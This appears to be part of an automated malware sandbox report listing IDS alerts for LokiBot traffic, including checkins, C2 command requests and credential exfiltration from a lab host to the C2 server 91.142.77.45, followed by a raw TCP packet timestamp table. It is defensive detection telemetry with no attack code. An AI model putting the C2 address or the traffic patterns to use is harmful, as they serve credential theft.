                                      192.168.2.691.142.77.4549720802825766 11/03/22-12:30:45.793165TCP2825766ETPRO TROJAN LokiBot Checkin M24972080192.168.2.691.142.77.45
                                      192.168.2.68.8.8.854903532014169 11/03/22-12:30:36.914690UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5490353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549718802021641 11/03/22-12:30:37.003049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802024313 11/03/22-12:31:35.606377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802021641 11/03/22-12:31:29.221112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802024318 11/03/22-12:31:35.606377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549717802825766 11/03/22-12:30:35.019960TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802025381 11/03/22-12:30:57.918358TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856547532014169 11/03/22-12:30:59.560048UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5654753192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549734802025381 11/03/22-12:31:25.377976TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549716802025381 11/03/22-12:30:32.992651TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.691.142.77.45
                                      192.168.2.68.8.8.859504532014169 11/03/22-12:30:22.044585UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5950453192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497272025483 11/03/22-12:31:03.547635TCP2025483ET TROJAN LokiBot Fake 404 Response804972791.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497362025483 11/03/22-12:31:30.738262TCP2025483ET TROJAN LokiBot Fake 404 Response804973691.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497382025483 11/03/22-12:31:35.287070TCP2025483ET TROJAN LokiBot Fake 404 Response804973891.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549717802021641 11/03/22-12:30:35.019960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802825766 11/03/22-12:31:29.221112TCP2825766ETPRO TROJAN LokiBot Checkin M24973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802025381 11/03/22-12:31:43.782645TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.691.142.77.45
                                      192.168.2.68.8.8.852556532014169 11/03/22-12:30:47.939957UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5255653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549723802024313 11/03/22-12:30:53.367985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802025381 11/03/22-12:30:31.132672TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549708802825766 11/03/22-12:30:14.035064TCP2825766ETPRO TROJAN LokiBot Checkin M24970880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802024313 11/03/22-12:31:41.893270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802025381 11/03/22-12:31:45.577786TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802024318 11/03/22-12:31:05.707382TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497302025483 11/03/22-12:31:09.196542TCP2025483ET TROJAN LokiBot Fake 404 Response804973091.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549742802024318 11/03/22-12:31:41.893270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802024313 11/03/22-12:31:05.707382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549730802021641 11/03/22-12:31:07.626823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802825766 11/03/22-12:31:43.782645TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497252025483 11/03/22-12:30:59.345748TCP2025483ET TROJAN LokiBot Fake 404 Response804972591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549707802024312 11/03/22-12:30:11.977904TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802024318 11/03/22-12:31:20.467945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.862520532014169 11/03/22-12:31:07.541345UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6252053192.168.2.68.8.8.8
                                      192.168.2.68.8.8.857322532014169 11/03/22-12:31:39.862228UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5732253192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549707802024317 11/03/22-12:30:11.977904TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802024313 11/03/22-12:31:20.467945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802024313 11/03/22-12:30:25.414440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802024318 11/03/22-12:30:59.657451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549724802825766 11/03/22-12:30:54.913991TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802825766 11/03/22-12:31:01.987085TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802021641 11/03/22-12:30:45.793165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549718802825766 11/03/22-12:30:37.003049TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802024318 11/03/22-12:30:53.367985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802021641 11/03/22-12:30:20.264286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549730802825766 11/03/22-12:31:07.626823TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497442025483 11/03/22-12:31:47.249314TCP2025483ET TROJAN LokiBot Fake 404 Response804974491.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549708802021641 11/03/22-12:30:14.035064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497192025483 11/03/22-12:30:45.376826TCP2025483ET TROJAN LokiBot Fake 404 Response804971991.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497082025483 11/03/22-12:30:15.684954TCP2025483ET TROJAN LokiBot Fake 404 Response804970891.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497332025483 11/03/22-12:31:25.021802TCP2025483ET TROJAN LokiBot Fake 404 Response804973391.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549733802825766 11/03/22-12:31:22.614964TCP2825766ETPRO TROJAN LokiBot Checkin M24973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549714802021641 11/03/22-12:30:27.432237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802024313 11/03/22-12:30:59.657451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497112025483 11/03/22-12:30:21.541561TCP2025483ET TROJAN LokiBot Fake 404 Response804971191.142.77.45192.168.2.6
                                      192.168.2.68.8.8.852079532014169 11/03/22-12:31:11.161882UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5207953192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549710802024313 11/03/22-12:30:18.297577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802025381 11/03/22-12:30:22.162497TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802024318 11/03/22-12:30:18.297577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802024318 11/03/22-12:31:50.569101TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.861833532014169 11/03/22-12:31:25.278309UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6183353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549733802021641 11/03/22-12:31:22.614964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802025381 11/03/22-12:30:09.785093TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802825766 11/03/22-12:30:20.264286TCP2825766ETPRO TROJAN LokiBot Checkin M24971180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497222025483 11/03/22-12:30:53.023996TCP2025483ET TROJAN LokiBot Fake 404 Response804972291.142.77.45192.168.2.6
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 3, 2022 12:30:06.648422003 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.705056906 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.767577887 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:09.767824888 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.785093069 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.847585917 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:09.847696066 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.911494017 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.378333092 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.378524065 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.378582001 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.441195965 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.912462950 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.974523067 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.974664927 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.977904081 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:12.039987087 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:12.040091991 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:12.102111101 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:13.686108112 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:13.686407089 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:13.689996004 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:13.752177954 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:13.960999012 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.024719000 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:14.024915934 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.035063982 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.097285032 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:14.097431898 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.159482002 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:15.684953928 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:15.685059071 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:15.685152054 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:15.747353077 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:16.009772062 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.071901083 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:16.072161913 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.075566053 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.137646914 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:16.137861967 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.199959040 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:17.656419039 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:17.656625032 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:17.656876087 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:17.718825102 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:18.232103109 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.294275999 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:18.294435978 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.297576904 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.359631062 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:18.359889030 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.666949987 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.729307890 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:19.791138887 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:19.791312933 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:19.791399956 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:19.853351116 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:20.195004940 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.257170916 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:20.260675907 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.264286041 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.326256037 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:20.327415943 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.389652014 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:21.541560888 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:21.541733980 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:21.541781902 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:21.854696989 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.066165924 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.128371954 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:22.128586054 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.162497044 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.224786043 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:22.224951029 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.287046909 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:22.464206934 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.527188063 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:23.556931019 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:23.557039022 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:23.557166100 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:23.619096041 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:25.335967064 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.401177883 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:25.401310921 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.414439917 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.476397991 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:25.476478100 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.538403988 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:26.998667002 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.002180099 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.002180099 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.064440012 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.367080927 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.428744078 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.428901911 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.432236910 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.493885994 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.493982077 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.886517048 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:28.386557102 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:28.448426008 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:29.899760008 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:29.899986029 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:29.900067091 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:29.962599993 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:31.066435099 CET4971580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:31.128760099 CET804971591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:31.128972054 CET4971580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:31.132672071 CET4971580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:31.194847107 CET804971591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:31.195020914 CET4971580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:31.257276058 CET804971591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:32.611166954 CET804971591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:32.611309052 CET4971580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:32.611351013 CET4971580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:32.673342943 CET804971591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:32.927229881 CET4971680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:32.989010096 CET804971691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:32.989780903 CET4971680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:32.992650986 CET4971680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:33.054290056 CET804971691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:33.057817936 CET4971680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:33.119534016 CET804971691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:34.572782040 CET804971691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:34.573118925 CET4971680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:34.573695898 CET4971680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:34.635202885 CET804971691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:34.955142975 CET4971780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:35.017050982 CET804971791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:35.017249107 CET4971780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:35.019959927 CET4971780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:35.081729889 CET804971791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:35.081929922 CET4971780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:35.143773079 CET804971791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:36.516442060 CET804971791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:36.516741991 CET4971780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:36.517160892 CET4971780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:36.578659058 CET804971791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:36.937236071 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:36.999310970 CET804971891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:36.999479055 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:37.003048897 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:37.065037966 CET804971891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:37.065248966 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:37.371615887 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:37.684214115 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:38.293596983 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:39.512592077 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:39.574800014 CET804971891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:41.067852974 CET804971891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:41.067995071 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:41.068048954 CET4971880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:41.130291939 CET804971891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:42.367435932 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:42.429584980 CET804971991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:42.429780006 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:42.564459085 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:42.856527090 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:42.918482065 CET804971991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:43.169044971 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:43.841007948 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:43.904088020 CET804971991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:45.376826048 CET804971991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:45.376966953 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:45.377012968 CET4971980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:45.439172029 CET804971991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:45.726284027 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:45.787942886 CET804972091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:45.788233995 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:45.793164968 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:45.854969978 CET804972091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:45.855376005 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:46.207489014 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:46.269138098 CET804972091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:47.547245026 CET804972091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:47.547395945 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:47.547475100 CET4972080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:47.609019041 CET804972091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:47.966005087 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:48.028449059 CET804972191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:48.028647900 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:48.032802105 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:48.325807095 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:48.638204098 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:48.742851019 CET804972191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:50.362963915 CET804972191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:50.363198996 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:50.363251925 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:50.756397963 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:50.818571091 CET804972291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:50.818783998 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:50.822443962 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:51.122917891 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:51.185391903 CET804972291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:51.438905001 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:51.501465082 CET804972291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:51.560430050 CET4972180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:51.623074055 CET804972191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:53.023996115 CET804972291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:53.025599003 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:53.025649071 CET4972280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:53.087821007 CET804972291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:53.295505047 CET4972380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:53.357762098 CET804972391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:53.361790895 CET4972380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:53.367985010 CET4972380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:53.430071115 CET804972391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:53.430174112 CET4972380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:53.492078066 CET804972391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:54.557574987 CET804972391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:54.557756901 CET4972380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:54.557861090 CET4972380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:54.619935989 CET804972391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:54.840115070 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:54.902261019 CET804972491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:54.902530909 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:54.913990974 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:55.216989040 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:55.279050112 CET804972491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:55.529526949 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:56.139131069 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:56.201148033 CET804972491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:57.636605024 CET804972491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:57.636871099 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:57.636979103 CET4972480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:57.698868990 CET804972491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:57.852768898 CET4972580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:57.915365934 CET804972591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:57.915684938 CET4972580192.168.2.691.142.77.45
